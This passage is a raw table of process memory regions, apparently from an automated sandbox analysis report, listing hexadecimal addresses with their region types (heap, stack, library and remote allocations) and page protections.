|
page execute and read and write
|
||
9C0000
|
heap
|
page read and write
|
||
169B63C0000
|
heap
|
page read and write
|
||
406D000
|
trusted library allocation
|
page read and write
|
||
2FCD000
|
trusted library allocation
|
page read and write
|
||
12D345A4000
|
heap
|
page read and write
|
||
303B000
|
trusted library allocation
|
page read and write
|
||
3D31000
|
trusted library allocation
|
page read and write
|
||
19EE7C0E000
|
trusted library allocation
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
161B336B000
|
heap
|
page read and write
|
||
19EFFDC1000
|
heap
|
page read and write
|
||
19EE5CEE000
|
heap
|
page read and write
|
||
517F000
|
stack
|
page read and write
|
||
7FFD9B73F000
|
trusted library allocation
|
page read and write
|
||
1CBBDCDC000
|
heap
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
3031000
|
trusted library allocation
|
page read and write
|
||
4D07EFE000
|
stack
|
page read and write
|
||
161B3307000
|
heap
|
page read and write
|
||
1CA8B5DE000
|
trusted library allocation
|
page read and write
|
||
2FF1000
|
trusted library allocation
|
page read and write
|
||
2FA5000
|
trusted library allocation
|
page read and write
|
||
1CBBF87D000
|
heap
|
page read and write
|
||
19EE867E000
|
trusted library allocation
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
1FD32C7E000
|
heap
|
page read and write
|
||
7FFD9B720000
|
trusted library allocation
|
page read and write
|
||
1CA88A40000
|
heap
|
page read and write
|
||
3059000
|
trusted library allocation
|
page read and write
|
||
27802994000
|
trusted library allocation
|
page read and write
|
||
9F9A57E000
|
stack
|
page read and write
|
||
3512000
|
heap
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
2F8B000
|
trusted library allocation
|
page read and write
|
||
57C2000
|
unkown
|
page read and write
|
||
1CA8ACA1000
|
trusted library allocation
|
page read and write
|
||
1050000
|
heap
|
page read and write
|
||
18C7000
|
trusted library allocation
|
page execute and read and write
|
||
125324E9000
|
heap
|
page read and write
|
||
3035000
|
trusted library allocation
|
page read and write
|
||
7FFD9B47D000
|
trusted library allocation
|
page execute and read and write
|
||
19EE5CDA000
|
heap
|
page read and write
|
||
9C83D7B000
|
stack
|
page read and write
|
||
7FFD9B622000
|
trusted library allocation
|
page read and write
|
||
D54000
|
trusted library allocation
|
page read and write
|
||
2E50000
|
trusted library allocation
|
page execute and read and write
|
||
1CBBF881000
|
heap
|
page read and write
|
||
14E0000
|
heap
|
page read and write
|
||
1FD30FB8000
|
heap
|
page read and write
|
||
7FFD9B5A0000
|
trusted library allocation
|
page execute and read and write
|
||
1CA88B48000
|
heap
|
page read and write
|
||
7FFD9B6A0000
|
trusted library allocation
|
page read and write
|
||
319E000
|
stack
|
page read and write
|
||
2FFD000
|
trusted library allocation
|
page read and write
|
||
1CBBF852000
|
heap
|
page read and write
|
||
7FFD9B662000
|
trusted library allocation
|
page read and write
|
||
1CBBF878000
|
heap
|
page read and write
|
||
1080000
|
heap
|
page execute and read and write
|
||
7FFD9B680000
|
trusted library allocation
|
page read and write
|
||
1CBBF875000
|
heap
|
page read and write
|
||
5AFF000
|
stack
|
page read and write
|
||
18B2000
|
trusted library allocation
|
page execute and read and write
|
||
1CBBF849000
|
heap
|
page read and write
|
||
1CBBF85A000
|
heap
|
page read and write
|
||
19EE7BC1000
|
trusted library allocation
|
page read and write
|
||
1FD311CE000
|
heap
|
page read and write
|
||
12DE000
|
stack
|
page read and write
|
||
1CBBF84A000
|
heap
|
page read and write
|
||
7FFD9B49B000
|
trusted library allocation
|
page read and write
|
||
278117CF000
|
trusted library allocation
|
page read and write
|
||
D6F000
|
stack
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
19EE5C98000
|
heap
|
page read and write
|
||
169B55EA000
|
heap
|
page read and write
|
||
4D081FD000
|
stack
|
page read and write
|
||
1CBBF803000
|
heap
|
page read and write
|
||
9F9A70E000
|
stack
|
page read and write
|
||
1CBBDCDD000
|
heap
|
page read and write
|
||
305D000
|
trusted library allocation
|
page read and write
|
||
7FFD9B710000
|
trusted library allocation
|
page read and write
|
||
1CBBF887000
|
heap
|
page read and write
|
||
300B000
|
trusted library allocation
|
page read and write
|
||
1CBBF866000
|
heap
|
page read and write
|
||
7DF49C9D0000
|
trusted library allocation
|
page execute and read and write
|
||
64620FE000
|
stack
|
page read and write
|
||
13B0000
|
heap
|
page read and write
|
||
9F9977D000
|
stack
|
page read and write
|
||
7FFD9B660000
|
trusted library allocation
|
page execute and read and write
|
||
1344000
|
trusted library allocation
|
page read and write
|
||
125324FB000
|
heap
|
page read and write
|
||
9E21F7F000
|
stack
|
page read and write
|
||
1CBBF881000
|
heap
|
page read and write
|
||
32D7000
|
trusted library allocation
|
page read and write
|
||
1390000
|
heap
|
page read and write
|
||
1CBBF7E3000
|
heap
|
page read and write
|
||
2FE1000
|
trusted library allocation
|
page read and write
|
||
2FAB000
|
trusted library allocation
|
page read and write
|
||
5E01000
|
unkown
|
page read and write
|
||
1CBBF866000
|
heap
|
page read and write
|
||
1CAA2CDE000
|
heap
|
page read and write
|
||
3001000
|
trusted library allocation
|
page read and write
|
||
2FE7000
|
trusted library allocation
|
page read and write
|
||
1CBBF849000
|
heap
|
page read and write
|
||
1802000
|
trusted library allocation
|
page execute and read and write
|
||
125324EE000
|
heap
|
page read and write
|
||
5441000
|
trusted library allocation
|
page read and write
|
||
1CBBF887000
|
heap
|
page read and write
|
||
9E2217D000
|
stack
|
page read and write
|
||
1FD30F99000
|
heap
|
page read and write
|
||
9C836FF000
|
stack
|
page read and write
|
||
7FFD9B6E0000
|
trusted library allocation
|
page read and write
|
||
4FBE000
|
stack
|
page read and write
|
||
DD7000
|
trusted library allocation
|
page execute and read and write
|
||
1CBBF864000
|
heap
|
page read and write
|
||
7FFD9B520000
|
trusted library allocation
|
page read and write
|
||
1CA8AFE9000
|
trusted library allocation
|
page read and write
|
||
161B4E7D000
|
heap
|
page read and write
|
||
5C01000
|
heap
|
page read and write
|
||
2FEF000
|
trusted library allocation
|
page read and write
|
||
12D35CE0000
|
heap
|
page read and write
|
||
576E000
|
stack
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
1CA88B5F000
|
heap
|
page read and write
|
||
32DB000
|
trusted library allocation
|
page read and write
|
||
40BA000
|
trusted library allocation
|
page read and write
|
||
3029000
|
trusted library allocation
|
page read and write
|
||
3069000
|
trusted library allocation
|
page read and write
|
||
161B336B000
|
heap
|
page read and write
|
||
169B56E5000
|
trusted library allocation
|
page read and write
|
||
26AE000
|
stack
|
page read and write
|
||
4F80000
|
heap
|
page read and write
|
||
DE2000
|
trusted library allocation
|
page execute and read and write
|
||
161B33C8000
|
heap
|
page read and write
|
||
32ED000
|
trusted library allocation
|
page read and write
|
||
1C4864C000
|
stack
|
page read and write
|
||
9F9A78B000
|
stack
|
page read and write
|
||
1CBBF87D000
|
heap
|
page read and write
|
||
1CBBF880000
|
heap
|
page read and write
|
||
12D345A0000
|
heap
|
page read and write
|
||
1CBBF886000
|
heap
|
page read and write
|
||
309A000
|
trusted library allocation
|
page read and write
|
||
257B7DAE000
|
heap
|
page read and write
|
||
169B56D5000
|
trusted library allocation
|
page read and write
|
||
12D35028000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7C0000
|
trusted library allocation
|
page read and write
|
||
304B000
|
trusted library allocation
|
page read and write
|
||
161B4DF0000
|
heap
|
page read and write
|
||
44E1000
|
trusted library allocation
|
page read and write
|
||
1C4899E000
|
stack
|
page read and write
|
||
125324B2000
|
heap
|
page read and write
|
||
161B3370000
|
heap
|
page read and write
|
||
1CBBF849000
|
heap
|
page read and write
|
||
169B6097000
|
heap
|
page read and write
|
||
1CA8AC51000
|
trusted library allocation
|
page read and write
|
||
4D6E000
|
stack
|
page read and write
|
||
125324EE000
|
heap
|
page read and write
|
||
1CBBF86F000
|
heap
|
page read and write
|
||
9E2243E000
|
stack
|
page read and write
|
||
1CBBF85A000
|
heap
|
page read and write
|
||
15A0000
|
heap
|
page read and write
|
||
3009000
|
trusted library allocation
|
page read and write
|
||
1CBBF85A000
|
heap
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
9F9947E000
|
stack
|
page read and write
|
||
257B7DA9000
|
heap
|
page read and write
|
||
1CA8AB67000
|
trusted library allocation
|
page read and write
|
||
19EE8659000
|
trusted library allocation
|
page read and write
|
||
1CBBF852000
|
heap
|
page read and write
|
||
1CBBF87D000
|
heap
|
page read and write
|
||
4DF0000
|
heap
|
page read and write
|
||
12532400000
|
heap
|
page read and write
|
||
19EE7D4B000
|
trusted library allocation
|
page read and write
|
||
19E80200000
|
heap
|
page read and write
|
||
57EF000
|
stack
|
page read and write
|
||
12532450000
|
heap
|
page read and write
|
||
1CBBDCDA000
|
heap
|
page read and write
|
||
161B3347000
|
heap
|
page read and write
|
||
1CBBF879000
|
heap
|
page read and write
|
||
64623FF000
|
stack
|
page read and write
|
||
9F99B7B000
|
stack
|
page read and write
|
||
9C83A7C000
|
stack
|
page read and write
|
||
1CBBF85A000
|
heap
|
page read and write
|
||
12532544000
|
heap
|
page read and write
|
||
2FB9000
|
trusted library allocation
|
page read and write
|
||
15CD000
|
heap
|
page read and write
|
||
1CBBF868000
|
heap
|
page read and write
|
||
1155000
|
heap
|
page read and write
|
||
27802198000
|
trusted library allocation
|
page read and write
|
||
125324E9000
|
heap
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
12532477000
|
heap
|
page read and write
|
||
7FFD9B7B0000
|
trusted library allocation
|
page read and write
|
||
1CA88B44000
|
heap
|
page read and write
|
||
12532650000
|
trusted library allocation
|
page read and write
|
||
1CBBF88B000
|
heap
|
page read and write
|
||
1CBBF87D000
|
heap
|
page read and write
|
||
7FFD9B730000
|
trusted library allocation
|
page read and write
|
||
1CA8B67E000
|
trusted library allocation
|
page read and write
|
||
5620000
|
heap
|
page read and write
|
||
9F9A64D000
|
stack
|
page read and write
|
||
32E1000
|
trusted library allocation
|
page read and write
|
||
1CBBF867000
|
heap
|
page read and write
|
||
2FDB000
|
trusted library allocation
|
page read and write
|
||
1CBBF87A000
|
heap
|
page read and write
|
||
27800223000
|
trusted library allocation
|
page read and write
|
||
B30000
|
heap
|
page read and write
|
||
104E000
|
stack
|
page read and write
|
||
169B55D1000
|
heap
|
page read and write
|
||
34E1000
|
trusted library allocation
|
page read and write
|
||
3045000
|
trusted library allocation
|
page read and write
|
||
2781006D000
|
trusted library allocation
|
page read and write
|
||
1CBBF866000
|
heap
|
page read and write
|
||
1FD32BF4000
|
heap
|
page read and write
|
||
1560000
|
trusted library allocation
|
page read and write
|
||
161B339A000
|
heap
|
page read and write
|
||
19EFFD96000
|
heap
|
page execute and read and write
|
||
1CBBF87E000
|
heap
|
page read and write
|
||
1FD30FB2000
|
heap
|
page read and write
|
||
7FFD9B6D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B53C000
|
trusted library allocation
|
page execute and read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
1CBBF878000
|
heap
|
page read and write
|
||
2FC1000
|
trusted library allocation
|
page read and write
|
||
3282000
|
trusted library allocation
|
page read and write
|
||
1CBBF867000
|
heap
|
page read and write
|
||
2D90000
|
heap
|
page read and write
|
||
1CBBF88E000
|
heap
|
page read and write
|
||
161B32B0000
|
heap
|
page read and write
|
||
1FD311CE000
|
heap
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
1CBBF800000
|
heap
|
page read and write
|
||
125324B2000
|
heap
|
page read and write
|
||
7FFD9B740000
|
trusted library allocation
|
page read and write
|
||
257B7DAE000
|
heap
|
page read and write
|
||
DA2000
|
trusted library allocation
|
page execute and read and write
|
||
2821000
|
trusted library allocation
|
page read and write
|
||
1CBBF83F000
|
heap
|
page read and write
|
||
4E00000
|
heap
|
page read and write
|
||
12D34ED0000
|
heap
|
page read and write
|
||
308B000
|
trusted library allocation
|
page read and write
|
||
125324E9000
|
heap
|
page read and write
|
||
1CBBF878000
|
heap
|
page read and write
|
||
278117D8000
|
trusted library allocation
|
page read and write
|
||
1663000
|
heap
|
page read and write
|
||
169B56D8000
|
trusted library allocation
|
page read and write
|
||
AF6000
|
stack
|
page read and write
|
||
1CBBF85A000
|
heap
|
page read and write
|
||
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
1CBBF83F000
|
heap
|
page read and write
|
||
1FD32C7E000
|
heap
|
page read and write
|
||
32A7000
|
trusted library allocation
|
page read and write
|
||
169B55E9000
|
heap
|
page read and write
|
||
161B3370000
|
heap
|
page read and write
|
||
4DCE000
|
stack
|
page read and write
|
||
278044DF000
|
trusted library allocation
|
page read and write
|
||
12533F30000
|
heap
|
page read and write
|
||
1CBBF869000
|
heap
|
page read and write
|
||
5730000
|
unkown
|
page read and write
|
||
CEB000
|
stack
|
page read and write
|
||
1450000
|
heap
|
page read and write
|
||
51C000
|
remote allocation
|
page execute and read and write
|
||
27800398000
|
trusted library allocation
|
page read and write
|
||
12D342B1000
|
heap
|
page read and write
|
||
7FFD9B62A000
|
trusted library allocation
|
page read and write
|
||
1CBBF866000
|
heap
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
7FFD9B540000
|
trusted library allocation
|
page execute and read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
53AE000
|
stack
|
page read and write
|
||
1CA9AB50000
|
trusted library allocation
|
page read and write
|
||
2F99000
|
trusted library allocation
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
1830000
|
trusted library allocation
|
page read and write
|
||
5A80000
|
unkown
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
561E000
|
stack
|
page read and write
|
||
9E2263B000
|
stack
|
page read and write
|
||
3055000
|
trusted library allocation
|
page read and write
|
||
1CAA2E66000
|
heap
|
page read and write
|
||
5410000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B7D0000
|
trusted library allocation
|
page read and write
|
||
A94000
|
heap
|
page read and write
|
||
1CBBF83F000
|
heap
|
page read and write
|
||
2F3C000
|
stack
|
page read and write
|
||
2F9B000
|
trusted library allocation
|
page read and write
|
||
2D31000
|
trusted library allocation
|
page read and write
|
||
5A00000
|
unkown
|
page read and write
|
||
169B55EB000
|
heap
|
page read and write
|
||
161B33D7000
|
heap
|
page read and write
|
||
1CBBF881000
|
heap
|
page read and write
|
||
1CBBF83F000
|
heap
|
page read and write
|
||
9E220FE000
|
stack
|
page read and write
|
||
1CBBF866000
|
heap
|
page read and write
|
||
278110E9000
|
trusted library allocation
|
page read and write
|
||
12D34EC2000
|
heap
|
page read and write
|
||
165C000
|
heap
|
page read and write
|
||
15EF000
|
stack
|
page read and write
|
||
19EE7CB5000
|
trusted library allocation
|
page read and write
|
||
2F70000
|
unkown
|
page execute and read and write
|
||
9E2328B000
|
stack
|
page read and write
|
||
12D346B0000
|
trusted library allocation
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
7FFD9B700000
|
trusted library allocation
|
page read and write
|
||
278044A3000
|
trusted library allocation
|
page read and write
|
||
9C8488E000
|
stack
|
page read and write
|
||
1CA8B63A000
|
trusted library allocation
|
page read and write
|
||
161B33C5000
|
heap
|
page read and write
|
||
300F000
|
trusted library allocation
|
page read and write
|
||
1CA8A490000
|
trusted library allocation
|
page read and write
|
||
AEC000
|
heap
|
page read and write
|
||
4D07CF3000
|
stack
|
page read and write
|
||
278102F4000
|
trusted library allocation
|
page read and write
|
||
1CBBF877000
|
heap
|
page read and write
|
||
1CBBF7E5000
|
heap
|
page read and write
|
||
1CBBF7E0000
|
heap
|
page read and write
|
||
57ED000
|
direct allocation
|
page execute and read and write
|
||
1CBBF841000
|
heap
|
page read and write
|
||
2FBD000
|
trusted library allocation
|
page read and write
|
||
1CBBF84A000
|
heap
|
page read and write
|
||
3484000
|
heap
|
page read and write
|
||
1CBBF7F8000
|
heap
|
page read and write
|
||
18AF000
|
stack
|
page read and write
|
||
4D085FE000
|
stack
|
page read and write
|
||
1CBBF855000
|
heap
|
page read and write
|
||
1C47DB3000
|
stack
|
page read and write
|
||
12532458000
|
heap
|
page read and write
|
||
19E80259000
|
heap
|
page read and write
|
||
1CBBF883000
|
heap
|
page read and write
|
||
7FFD9B620000
|
trusted library allocation
|
page read and write
|
||
9C83CFB000
|
stack
|
page read and write
|
||
7FFD9B472000
|
trusted library allocation
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
1CA88B8C000
|
heap
|
page read and write
|
||
1CBBF887000
|
heap
|
page read and write
|
||
1CBBF884000
|
heap
|
page read and write
|
||
D9A000
|
trusted library allocation
|
page execute and read and write
|
||
4D087FB000
|
stack
|
page read and write
|
||
1CA8B640000
|
trusted library allocation
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
64624FE000
|
stack
|
page read and write
|
||
1CAA2C55000
|
heap
|
page read and write
|
||
56BE000
|
stack
|
page read and write
|
||
49BE000
|
stack
|
page read and write
|
||
100F000
|
stack
|
page read and write
|
||
1336000
|
stack
|
page read and write
|
||
169B6088000
|
heap
|
page read and write
|
||
1CBBF84A000
|
heap
|
page read and write
|
||
2810000
|
heap
|
page read and write
|
||
1CBBF862000
|
heap
|
page read and write
|
||
161B3334000
|
heap
|
page read and write
|
||
1CBBF88E000
|
heap
|
page read and write
|
||
7FFD9B690000
|
trusted library allocation
|
page read and write
|
||
1CBBF866000
|
heap
|
page read and write
|
||
ECE000
|
stack
|
page read and write
|
||
3079000
|
trusted library allocation
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
1253253F000
|
heap
|
page read and write
|
||
2FD3000
|
trusted library allocation
|
page read and write
|
||
1CA8AC54000
|
trusted library allocation
|
page read and write
|
||
257B82E0000
|
heap
|
page read and write
|
||
DA0000
|
trusted library allocation
|
page execute and read and write
|
||
2781257C000
|
trusted library allocation
|
page read and write
|
||
1CBBF878000
|
heap
|
page read and write
|
||
1CBBF87D000
|
heap
|
page read and write
|
||
9F99BFB000
|
stack
|
page read and write
|
||
E47000
|
heap
|
page read and write
|
||
19EE7C35000
|
trusted library allocation
|
page read and write
|
||
301B000
|
trusted library allocation
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
1CBBF85A000
|
heap
|
page read and write
|
||
1590000
|
trusted library allocation
|
page read and write
|
||
7FFD9B690000
|
trusted library allocation
|
page read and write
|
||
3003000
|
trusted library allocation
|
page read and write
|
||
152E000
|
stack
|
page read and write
|
||
278102FE000
|
trusted library allocation
|
page read and write
|
||
1FD312E6000
|
heap
|
page read and write
|
||
3065000
|
trusted library allocation
|
page read and write
|
||
1577000
|
trusted library allocation
|
page execute and read and write
|
||
169B55E9000
|
heap
|
page read and write
|
||
1CBBF852000
|
heap
|
page read and write
|
||
DDE000
|
stack
|
page read and write
|
||
7FFD9B630000
|
trusted library allocation
|
page execute and read and write
|
||
1CBBDCD9000
|
heap
|
page read and write
|
||
1FD32BF0000
|
heap
|
page read and write
|
||
1CBBF879000
|
heap
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
1CBBF888000
|
heap
|
page read and write
|
||
19EE8666000
|
trusted library allocation
|
page read and write
|
||
9F9A5CE000
|
stack
|
page read and write
|
||
2F81000
|
trusted library allocation
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
1860000
|
heap
|
page read and write
|
||
D6A000
|
trusted library allocation
|
page execute and read and write
|
||
257B7DA7000
|
heap
|
page read and write
|
||
12D3500D000
|
trusted library allocation
|
page read and write
|
||
A2E000
|
stack
|
page read and write
|
||
12D34EB8000
|
heap
|
page read and write
|
||
1A80000
|
heap
|
page execute and read and write
|
||
4D00000
|
heap
|
page read and write
|
||
1CBBF852000
|
heap
|
page read and write
|
||
19EF7C20000
|
trusted library allocation
|
page read and write
|
||
161B336B000
|
heap
|
page read and write
|
||
3007000
|
trusted library allocation
|
page read and write
|
||
1C4874E000
|
stack
|
page read and write
|
||
169B608F000
|
heap
|
page read and write
|
||
1CBBF87B000
|
heap
|
page read and write
|
||
1CA8B5D6000
|
trusted library allocation
|
page read and write
|
||
19EFFD90000
|
heap
|
page execute and read and write
|
||
2FA3000
|
trusted library allocation
|
page read and write
|
||
1CA8B5F4000
|
trusted library allocation
|
page read and write
|
||
9C8367F000
|
stack
|
page read and write
|
||
161B34B0000
|
heap
|
page read and write
|
||
1CBBF87D000
|
heap
|
page read and write
|
||
1253253F000
|
heap
|
page read and write
|
||
19EFFDE3000
|
heap
|
page read and write
|
||
A60000
|
trusted library allocation
|
page read and write
|
||
19EFFE82000
|
heap
|
page read and write
|
||
3041000
|
trusted library allocation
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
3081000
|
trusted library allocation
|
page read and write
|
||
3025000
|
trusted library allocation
|
page read and write
|
||
2780299C000
|
trusted library allocation
|
page read and write
|
||
7C0000
|
heap
|
page read and write
|
||
1CBBF879000
|
heap
|
page read and write
|
||
3023000
|
trusted library allocation
|
page read and write
|
||
2FEB000
|
trusted library allocation
|
page read and write
|
||
1CBBF802000
|
heap
|
page read and write
|
||
64627FE000
|
stack
|
page read and write
|
||
1C481FF000
|
stack
|
page read and write
|
||
3A817FF000
|
stack
|
page read and write
|
||
4D086FE000
|
stack
|
page read and write
|
||
307B000
|
trusted library allocation
|
page read and write
|
||
1A50000
|
heap
|
page read and write
|
||
125324B6000
|
heap
|
page read and write
|
||
12D35025000
|
trusted library allocation
|
page read and write
|
||
7FFD9B750000
|
trusted library allocation
|
page read and write
|
||
346A000
|
heap
|
page read and write
|
||
307F000
|
trusted library allocation
|
page read and write
|
||
19E80269000
|
heap
|
page read and write
|
||
24FB5F20000
|
heap
|
page read and write
|
||
69B000
|
stack
|
page read and write
|
||
1CBBF880000
|
heap
|
page read and write
|
||
12532420000
|
heap
|
page read and write
|
||
257B81B0000
|
heap
|
page read and write
|
||
12532519000
|
heap
|
page read and write
|
||
5812000
|
heap
|
page read and write
|
||
2F89000
|
trusted library allocation
|
page read and write
|
||
169B5270000
|
heap
|
page read and write
|
||
1CBBF85B000
|
heap
|
page read and write
|
||
9E22337000
|
stack
|
page read and write
|
||
1CBBF87B000
|
heap
|
page read and write
|
||
19EE5D15000
|
heap
|
page read and write
|
||
1CBBF8E0000
|
heap
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
2FD9000
|
trusted library allocation
|
page read and write
|
||
161B32EF000
|
heap
|
page read and write
|
||
5BF0000
|
unkown
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
17EF000
|
stack
|
page read and write
|
||
7FFD9B6F0000
|
trusted library allocation
|
page read and write
|
||
161E000
|
heap
|
page read and write
|
||
1CBBF849000
|
heap
|
page read and write
|
||
24FB5F80000
|
heap
|
page read and write
|
||
169B524B000
|
trusted library allocation
|
page read and write
|
||
2FA7000
|
trusted library allocation
|
page read and write
|
||
12D3500B000
|
trusted library allocation
|
page read and write
|
||
169B6080000
|
heap
|
page read and write
|
||
1CBBF852000
|
heap
|
page read and write
|
||
3480000
|
heap
|
page read and write
|
||
1CA8AC5F000
|
trusted library allocation
|
page read and write
|
||
1CBBF880000
|
heap
|
page read and write
|
||
19E8025E000
|
heap
|
page read and write
|
||
5430000
|
trusted library allocation
|
page read and write
|
||
4D089FE000
|
stack
|
page read and write
|
||
27810001000
|
trusted library allocation
|
page read and write
|
||
24FB5F88000
|
heap
|
page read and write
|
||
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
2FBB000
|
trusted library allocation
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
125324DB000
|
heap
|
page read and write
|
||
257B7D90000
|
heap
|
page read and write
|
||
12D34ED0000
|
heap
|
page read and write
|
||
2FAF000
|
trusted library allocation
|
page read and write
|
||
64622FD000
|
stack
|
page read and write
|
||
19EE86CA000
|
trusted library allocation
|
page read and write
|
||
9C8397D000
|
stack
|
page read and write
|
||
1CA8B5E0000
|
trusted library allocation
|
page read and write
|
||
27810075000
|
trusted library allocation
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
8D5B2FF000
|
stack
|
page read and write
|
||
161B33CA000
|
heap
|
page read and write
|
||
328B000
|
trusted library allocation
|
page read and write
|
||
970000
|
heap
|
page read and write
|
||
1CBBF879000
|
heap
|
page read and write
|
||
123B000
|
stack
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
7F0000
|
heap
|
page read and write
|
||
5B78000
|
unkown
|
page read and write
|
||
382D000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
308D000
|
trusted library allocation
|
page read and write
|
||
18B0000
|
heap
|
page read and write
|
||
D77000
|
trusted library allocation
|
page execute and read and write
|
||
27804496000
|
trusted library allocation
|
page read and write
|
||
5900000
|
heap
|
page read and write
|
||
54A0000
|
heap
|
page read and write
|
||
5490000
|
heap
|
page execute and read and write
|
||
17FA000
|
trusted library allocation
|
page execute and read and write
|
||
5AE0000
|
unkown
|
page read and write
|
||
19EE5CD4000
|
heap
|
page read and write
|
||
4D07DFE000
|
stack
|
page read and write
|
||
2BE1000
|
trusted library allocation
|
page read and write
|
||
1CBBF873000
|
heap
|
page read and write
|
||
1CA8AB5B000
|
trusted library allocation
|
page read and write
|
||
4611000
|
trusted library allocation
|
page read and write
|
||
57DF000
|
stack
|
page read and write
|
||
3412000
|
heap
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
1CBBF863000
|
heap
|
page read and write
|
||
9C8490E000
|
stack
|
page read and write
|
||
1CAA2CD5000
|
heap
|
page read and write
|
||
19EE86C3000
|
trusted library allocation
|
page read and write
|
||
1CBBF867000
|
heap
|
page read and write
|
||
1580000
|
heap
|
page read and write
|
||
1CAA2E20000
|
heap
|
page read and write
|
||
19EE7BF0000
|
trusted library allocation
|
page read and write
|
||
B8D000
|
heap
|
page read and write
|
||
1CBBF873000
|
heap
|
page read and write
|
||
6461EF9000
|
stack
|
page read and write
|
||
1CBBF87D000
|
heap
|
page read and write
|
||
9F99A7E000
|
stack
|
page read and write
|
||
169B5243000
|
trusted library allocation
|
page read and write
|
||
3FAD000
|
trusted library allocation
|
page read and write
|
||
1CBBF871000
|
heap
|
page read and write
|
||
5CC9000
|
unkown
|
page read and write
|
||
1CBBF86E000
|
heap
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
1CBBF877000
|
heap
|
page read and write
|
||
125324B2000
|
heap
|
page read and write
|
||
32CE000
|
stack
|
page read and write
|
||
3089000
|
trusted library allocation
|
page read and write
|
||
1CBBF889000
|
heap
|
page read and write
|
||
1CBBF887000
|
heap
|
page read and write
|
||
161B3320000
|
heap
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
796000
|
stack
|
page read and write
|
||
27AF000
|
stack
|
page read and write
|
||
161B4E74000
|
heap
|
page read and write
|
||
2B1B000
|
trusted library allocation
|
page read and write
|
||
161B354B000
|
heap
|
page read and write
|
||
19EE5C50000
|
heap
|
page read and write
|
||
7FFD9B650000
|
trusted library allocation
|
page execute and read and write
|
||
1320000
|
trusted library allocation
|
page read and write
|
||
300D000
|
trusted library allocation
|
page read and write
|
||
553A000
|
heap
|
page read and write
|
||
19EFFE3A000
|
heap
|
page read and write
|
||
2F8D000
|
trusted library allocation
|
page read and write
|
||
169B5474000
|
heap
|
page read and write
|
||
327B000
|
trusted library allocation
|
page read and write
|
||
1CBBF852000
|
heap
|
page read and write
|
||
1FD311C9000
|
heap
|
page read and write
|
||
55DE000
|
stack
|
page read and write
|
||
1CBBF875000
|
heap
|
page read and write
|
||
5A00000
|
unkown
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
1CBBF7E6000
|
heap
|
page read and write
|
||
1CBBF85A000
|
heap
|
page read and write
|
||
278109A1000
|
trusted library allocation
|
page read and write
|
||
1A20000
|
heap
|
page read and write
|
||
2FD1000
|
trusted library allocation
|
page read and write
|
||
17AF000
|
stack
|
page read and write
|
||
9C837FD000
|
stack
|
page read and write
|
||
3017000
|
trusted library allocation
|
page read and write
|
||
7FFD9B730000
|
trusted library allocation
|
page read and write
|
||
12D35035000
|
trusted library allocation
|
page read and write
|
||
3015000
|
trusted library allocation
|
page read and write
|
||
7FFD9B530000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B720000
|
trusted library allocation
|
page read and write
|
||
17F2000
|
trusted library allocation
|
page execute and read and write
|
||
1FD312E0000
|
heap
|
page read and write
|
||
1CA8AC4B000
|
trusted library allocation
|
page read and write
|
||
3057000
|
trusted library allocation
|
page read and write
|
||
125324F8000
|
heap
|
page read and write
|
||
12F6000
|
stack
|
page read and write
|
||
27812589000
|
trusted library allocation
|
page read and write
|
||
3021000
|
trusted library allocation
|
page read and write
|
||
9C847CE000
|
stack
|
page read and write
|
||
9F997F9000
|
stack
|
page read and write
|
||
327D000
|
trusted library allocation
|
page read and write
|
||
53EE000
|
stack
|
page read and write
|
||
19EE7CB8000
|
trusted library allocation
|
page read and write
|
||
161B3307000
|
heap
|
page read and write
|
||
19EFFDBF000
|
heap
|
page read and write
|
||
9F9A80A000
|
stack
|
page read and write
|
||
19EE76B0000
|
trusted library allocation
|
page read and write
|
||
1CBBF873000
|
heap
|
page read and write
|
||
19EE5CAE000
|
heap
|
page read and write
|
||
1FD32C74000
|
heap
|
page read and write
|
||
18AE000
|
stack
|
page read and write
|
||
27811090000
|
trusted library allocation
|
page read and write
|
||
169B55E4000
|
heap
|
page read and write
|
||
3047000
|
trusted library allocation
|
page read and write
|
||
2FB3000
|
trusted library allocation
|
page read and write
|
||
2FCB000
|
trusted library allocation
|
page read and write
|
||
3085000
|
trusted library allocation
|
